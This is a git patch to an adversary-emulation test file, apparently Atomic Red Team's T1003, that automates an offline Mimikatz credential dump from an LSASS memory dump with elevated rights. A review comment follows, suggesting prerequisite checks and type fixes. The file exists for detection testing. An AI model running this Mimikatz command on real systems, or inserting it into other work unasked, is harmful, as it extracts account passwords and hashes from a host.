From fc060f9e92f483321dceebe2e5b7f784262a394d Mon Sep 17 00:00:00 2001
From: Mr B0b <6248411+Mr-B0b@users.noreply.github.com>
Date: Mon, 30 Dec 2019 16:18:57 +0100
Subject: [PATCH] Improve test 7 (Offline Mimikatz) for T1003 that performs Credential Dumping (#760)
---
 atomics/T1003/T1003.yaml | 22 ++++++++++------------
 1 file changed, 10 insertions(+), 12 deletions(-)
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 246ca7e1..0c01166a 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -137,22 +137,20 @@ atomic_tests:
 - windows
 input_arguments:
+ mimikatz_binary_path:
+ description: Path of the Mimikatz binary
+ type: string
+ default: $PathToAtomicsFolder\T1003\bin\mimikatz.exe
 input_file:
- description: Path where resulting dump should be placed
+ description: Path of the Lsass dump
 type: Path
- default: lsass_dump.dmp
+ default: C:\Windows\Temp\lsass_dump.dmp
 executor:
- name: manual
- steps: |
- 1. Open Mimikatz:
- Execute `mimikatz` at a command prompt.
-
- 2. Select a Memory Dump:
- Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
-
- 3. Obtain Credentials:
- Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
+ name: command_prompt
+ elevation_required: true
+ command: |
+ #{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
 - name: Dump Active Directory Database with NTDSUtil
 description: |
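Review bot: The new `command:` runs Mimikatz against `#{input_file}` without any check that the dump (default `C:\Windows\Temp\lsass_dump.dmp`) or the binary at `#{mimikatz_binary_path}` actually exists, so on a host missing either the harness reports the atomic as executed while Mimikatz only prints an error; if this schema version supports a prerequisite block, add one that verifies both paths, e.g. `if not exist "#{input_file}" exit /b 1`, before the command line. `mimikatz_binary_path` is declared `type: string` while its sibling `input_file` is `type: Path` — use `type: Path` for both. The `$PathToAtomicsFolder` default is presumably substituted by the harness, but cmd.exe will not expand it if the generated command is run by hand under this `command_prompt` executor; confirm it matches the spelling the other command_prompt tests in this file use. Because the default dump location is a shared temp directory, the test's description (outside this hunk, where the enclosing test begins) should state that an LSASS minidump must already be present at that path and that the file holds credential material to be removed after the run.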